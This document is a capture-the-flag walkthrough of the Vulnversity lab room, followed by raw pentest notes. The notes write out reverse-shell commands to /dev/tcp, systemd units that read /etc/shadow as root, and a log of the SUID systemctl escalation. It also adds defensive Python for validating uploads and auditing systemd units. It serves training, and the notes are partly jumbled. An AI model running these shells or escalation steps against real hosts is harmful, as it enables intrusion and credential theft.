VULNVERSIDAD
Vulnversidad Writeup
Task 1 (Deployment)
We deploy the machine.
Task 2 (Reconnaissance)
To perform the reconnaissance I used the Nmap tool with the following command: nmap -A -sV -p- -T4 <machine IP address>. This command scans every TCP port and returns detailed information about the services that are running.
In the scan results I observed that the machine has several active services, including FTP, SSH, Samba, a Squid proxy, and Apache on port 3333. I also obtained information about the operating system and the software versions.
Task 3 (GoBuster)
The next task is to use GoBuster to discover directories on the web server. I ran the command gobuster dir -u http://<IP address>:3333 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt to look for possible directories.
The results revealed several directories; the one of interest was "/internal". This directory contained a form that allowed file uploads.
Task 4 (Compromising the Web Server)
With the information about the "/internal" directory, the task was to compromise the web server. I created a PHP reverse shell file, renamed it to "payload.phtml" and uploaded it to the server. I started a Netcat listener and, on visiting the link provided, obtained access to the system.
I explored the file system and found the user flag in the home directory of the web server user.
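The upload form in "/internal" accepted "payload.phtml" because it filtered on the filename rather than on an allowlist. As an added example that is not the room's or this writeup's own code, the following Python check shows the server-side validation that would have rejected that upload: a lowercase allowlist of the final extension, rejection of any server-executable extension anywhere in the name, a magic-byte check that ignores the client's Content-Type header, and a server-chosen stored name. The allowlist, the extension set and the stored-name scheme are assumptions.

```python
import hashlib
from typing import Optional

# Allowlist (assumed policy for the /internal form, not the room's own code):
# lowercase extension -> magic bytes the content must begin with.
ALLOWED = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
# Extensions Apache may hand to the PHP engine. A denylist that only knew
# ".php" is why "payload.phtml" got through in the writeup.
SERVER_SIDE = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "phps"}

def validate_upload(filename: str, content: bytes) -> Optional[str]:
    """Return the name to store the file under, or None to reject it.

    The stored name is the content hash plus the verified extension, so the
    client-supplied filename never reaches disk.
    """
    base = filename.lower().replace("\\", "/").rsplit("/", 1)[-1]
    parts = base.split(".")
    if len(parts) < 2 or not parts[-1]:
        return None                       # no usable extension
    exts = parts[1:]
    # "x.php.png" can still be run by a multi-extension AddHandler setup,
    # so any server-side extension anywhere in the name is rejected.
    if SERVER_SIDE & set(exts):
        return None
    ext = exts[-1]
    if ext not in ALLOWED:
        return None
    # Trust the bytes, not the Content-Type header sent with the request.
    if not content.startswith(ALLOWED[ext]):
        return None
    return f"{hashlib.sha256(content).hexdigest()}.{ext}"
```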
Task 5 (Privilege Escalation)
While reviewing SUID files I found that "/bin/systemctl" had the SUID bit set. Using information from GTFOBins, I escalated privileges by running commands through systemctl. I created a temporary service, linked and enabled it, and that gave me root access.
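The escalation leaves a durable artifact on the host: a unit under /etc/systemd/system that points at a file in /tmp and whose ExecStart opens /dev/tcp. As an added example that is not part of this writeup, the following Python audit flags exactly those two signs, both on a live host and on an embedded constructed sample; the untrusted-directory list, the suspicious-pattern regex and the sample units are assumptions.

```python
import os
import re
from typing import List, Optional, Tuple

# Directories an unprivileged user can write to. A unit linked from here was
# not installed by a package or an administrator (cf. the writeup's
# "Created symlink ... to /tmp/rootshell.service"). Assumed list.
UNTRUSTED_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")
# Command fragments that do not belong in the ExecStart= of a legitimate unit.
SUSPICIOUS_EXEC = re.compile(r"/dev/tcp/|/etc/shadow|\b(?:ba)?sh -i\b")

Finding = Tuple[str, str]  # (unit path, reason)

def audit_unit(unit_path: str, link_target: Optional[str], text: str) -> List[Finding]:
    """Flag one unit by where its file really lives and what it executes.
    link_target is the resolved symlink target (None for a regular file)."""
    findings: List[Finding] = []
    real = link_target or unit_path
    if real.startswith(UNTRUSTED_DIRS):
        findings.append((unit_path, f"unit file lives in user-writable path {real}"))
    for line in text.splitlines():
        key, _, value = line.partition("=")
        if key.strip() == "ExecStart" and SUSPICIOUS_EXEC.search(value):
            findings.append((unit_path, f"suspicious ExecStart: {value.strip()}"))
    return findings

def scan_host(root: str = "/etc/systemd/system") -> List[Finding]:
    """Walk the administrator unit directory of a live host (needs read
    access; the constructed sample below does not touch the filesystem)."""
    findings: List[Finding] = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            target = os.path.realpath(path) if os.path.islink(path) else None
            try:
                with open(target or path, errors="replace") as fh:
                    text = fh.read()
            except OSError:
                text = ""  # dangling link or unreadable: still audited by path
            findings.extend(audit_unit(path, target, text))
    return findings

# Constructed sample: the unit from the writeup's notes next to a normal one.
SAMPLE_UNITS = [
    ("/etc/systemd/system/multi-user.target.wants/rootshell.service",
     "/tmp/rootshell.service",
     "[Service]\nType=simple\nUser=root\n"
     "ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.10.230.35/9999 0>&1'\n"),
    ("/etc/systemd/system/multi-user.target.wants/ssh.service",
     "/lib/systemd/system/ssh.service",
     "[Service]\nExecStart=/usr/sbin/sshd -D $SSHD_OPTS\n"),
]

def audit_sample() -> List[Finding]:
    return [f for p, t, x in SAMPLE_UNITS for f in audit_unit(p, t, x)]
```

Run scan_host() as root on the box to check the real unit tree; the writeup's link to /tmp/rootshell.service would be reported on both counts.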
Summary:
I deployed the machine and ran an Nmap scan to obtain information about the services.
I used GoBuster to discover directories on the web server.
I compromised the web server by uploading a PHP reverse shell file to the "/internal" directory.
I escalated privileges by abusing the SUID bit on "/bin/systemctl" as described on GTFOBins.
I obtained the user flag and the root flag.
This task provided valuable practice in reconnaissance, exploitation of web services and privilege escalation!
Notes: pentestinOfensivoVULNVERSIDAD.txt
OFFENSIVE PENTESTING
VULNVERSITY:
RECONNAISSANCE:
┌──(root㉿kali)-[~]
└─# nmap -sV 10.10.200.190
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-13 20:42 UTC
Nmap scan report for ip-10-10-200-190.eu-west-1.compute.internal (10.10.200.190)
Host is up (0.0075s latency).
Not shown: 994 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3128/tcp open http-proxy Squid http proxy 3.5.12
3333/tcp open http Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 02:F5:17:08:BC:07 (Unknown)
Service Info: Host: VULNUNIVERSITY; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.39 seconds
┌──(root㉿kali)-[~]
└─# searchsploit ftp vsftpd
-------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------- ---------------------------------
vsftpd 2.0.5 - 'CWD' (Authenticated) Remote Memory Cons | linux/dos/5814.pl
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Serv | windows/dos/31818.sh
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Serv | windows/dos/31819.pl
vsftpd 2.3.2 - Denial of Service | linux/dos/16270.c
vsftpd 2.3.4 - Backdoor Command Execution | unix/remote/49757.py
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | unix/remote/17491.rb
vsftpd 3.0.3 - Remote Denial of Service | multiple/remote/49719.py
-------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(root㉿kali)-[~]
└─# searchsploit -m multiple/remote/49719.py
Exploit: vsftpd 3.0.3 - Remote Denial of Service
URL: https://www.exploit-db.com/exploits/49719
Path: /usr/share/exploitdb/exploits/multiple/remote/49719.py
File Type: Python script, ASCII text executable
Copied to: /root/49719.py
┌──(root㉿kali)-[~]
└─# searchsploit Squid http
-------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------- ---------------------------------
Squid - 'httpMakeVaryMark()' Remote Denial of Service | linux/dos/38365.txt
Squid < 3.1 5 - HTTP Version Number Parsing Denial of S | multiple/dos/8021.pl
-------------------------------------------------------- ---------------------------------
Shellcodes: No Results
/////////////////////////////////////
We list the resources shared over SMB:
┌──(root㉿kali)-[~]
└─# smbclient -L //10.10.200.190 -U guest
Password for [WORKGROUP\guest]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (vulnuniversity server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP VULNUNIVERSITY
POST /internal/index.php HTTP/1.1
Host: 10.10.200.190:3333
Content-Length: 3387
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.200.190:3333
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBsRFqB8h7iwsROLb
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.200.190:3333/internal/index.php
Accept-Encoding: gzip, deflate, br
Accept-Language: es-419,es;q=0.9
Connection: close
------WebKitFormBoundaryBsRFqB8h7iwsROLb
Content-Disposition: form-data; name="file"; filename="0f93a§extension§"
Content-Type: image/png
‰PNG
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c '/bin/sh -i >& /dev/tcp/10.10.230.35/443 0>&1'
[Install]
WantedBy=multi-user.target' > $TF
sudo systemctl link $TF
sudo systemctl enable --now $TF
[Unit]
Description=roooooooooot
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.10.230.35/9999 0>&1'
[Install]
WantedBy=multi-user.target
[Install]
WantedBy=multi-user.target > $TF
Created symlink from /etc/systemd/system/multi-user.target.wants/rootshell.service to /tmp/rootshell.service
//////////////////////
IT WORKS: THE COMMANDS RUN AS ROOT, BUT WE DO NOT GET THE SHELL
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "cat /etc/shadow > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
sudo systemctl link $TF
sudo systemctl enable --now $TF
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "find / -type f -name flag.txt > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
sudo systemctl link $TF
sudo systemctl enable --now $TF
┌──(root㉿kali)-[~]
└─# stty raw -echo; fg
[1] + continued nc -lnvp 9999
www-data@vulnuniversity:/$ ls
bin etc lib media proc sbin sys var
boot home lib64 mnt root snap tmp vmlinuz
dev initrd.img lost+found opt run srv usr
www-data@vulnuniversity:/$ ls /tmp
systemd-private-bdeefd24b3db404dbd455703dfaffa8a-systemd-timesyncd.service-zaUH8g
www-data@vulnuniversity:/$ ls /root
ls: cannot open directory '/root': Permission denied
www-data@vulnuniversity:/$ TF=$(mktemp).service
www-data@vulnuniversity:/$ echo '[Service]
> Type=oneshot
> ExecStart=/bin/sh -c "cat /etc/shadow > /tmp/output"
> [Install]
> WantedBy=multi-user.target' > $TF
www-data@vulnuniversity:/$ ls /tmp
systemd-private-bdeefd24b3db404dbd455703dfaffa8a-systemd-timesyncd.service-zaUH8g
tmp.emRl5R2fIU
tmp.emRl5R2fIU.service
www-data@vulnuniversity:/$ systemctl link $TF
Created symlink from /etc/systemd/system/tmp.emRl5R2fIU.service to /tmp/tmp.emRl5R2fIU.service.
www-data@vulnuniversity:/$ ls /tmp
systemd-private-bdeefd24b3db404dbd455703dfaffa8a-systemd-timesyncd.service-zaUH8g
tmp.emRl5R2fIU
tmp.emRl5R2fIU.service
www-data@vulnuniversity:/$ systemctl enable --now $TF
Created symlink from /etc/systemd/system/multi-user.target.wants/tmp.emRl5R2fIU.service to /tmp/tmp.emRl5R2fIU.service.
www-data@vulnuniversity:/$ ls /tmp
output
systemd-private-bdeefd24b3db404dbd455703dfaffa8a-systemd-timesyncd.service-zaUH8g
tmp.emRl5R2fIU
tmp.emRl5R2fIU.service
www-data@vulnuniversity:/$ cat /tmp/output
//////////////////////
WE TRY THE GITHUB GUIDE to get the shell as ROOT:
VICTIM:
www-data@vulnuniversity:/tmp$ cat root.service
[Unit]
Description=roooooooooot
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.10.190.200/9998 0>&1'
[Install]
WantedBy=multi-user.target
www-data@vulnuniversity:/tmp$ /bin/systemctl enable /tmp/root.service
Created symlink from /etc/systemd/system/multi-user.target.wants/root.service to /tmp/root.service.
Created symlink from /etc/systemd/system/root.service to /tmp/root.service.
www-data@vulnuniversity:/tmp$ /bin/systemctl start root.service
ATTACKER:
┌──(root㉿kali)-[~]
└─# nc -lnvp 9998
listening on [any] 9998 ...
connect to [10.10.190.200] from (UNKNOWN) [10.10.108.57] 56478
bash: cannot set terminal process group (2013): Inappropriate ioctl for device
bash: no job control in this shell
root@vulnuniversity:/# whoami
whoami
root
root@vulnuniversity:/# find / -type f -name flag.txt 2>/dev/null
find / -type f -name flag.txt 2>/dev/null
root@vulnuniversity:/# ls
ls
bin
boot
dev
etc
home
initrd.img
lib
lib64
lost+found
media
mnt
opt
proc
root
run
sbin
snap
srv
sys
tmp
usr
var
vmlinuz
root@vulnuniversity:/# cd root
cd root
root@vulnuniversity:~# ls
ls
root.txt
root@vulnuniversity:~# cat root.txt
cat root.txt
a58ff8579f0a9270368d33a9966c7fd5